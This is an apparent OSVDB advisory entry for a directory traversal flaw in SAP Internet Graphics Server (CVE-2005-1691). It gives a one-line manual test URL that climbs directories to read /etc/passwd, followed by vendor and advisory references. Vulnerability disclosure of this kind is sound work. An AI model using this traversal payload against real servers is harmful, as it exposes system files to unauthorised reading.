SAP Internet Graphics Server (IGS) Traversal Arbitrary File Access

2005-07-25T12:05:17
ID OSVDB:18255
Type osvdb
Reporter OSVDB
Modified 2005-07-25T12:05:17

Description

Manual Testing Notes

http://[target]/htdocs/../../../../../../../../../../../../etc/passwd

References:

Vendor URL: http://www.sap.com Security Tracker: 1014568 Secunia Advisory ID:16208 Other Advisory URL: http://www.uniras.gov.uk/niscc/docs/re-20050725-00622.pdf?lang=en Other Advisory URL: http://www.corsaire.com/advisories/c050503-001.txt Mail List Post: http://archives.neohapsis.com/archives/vulnwatch/2005-q3/0013.html Keyword: c050503-001 CVE-2005-1691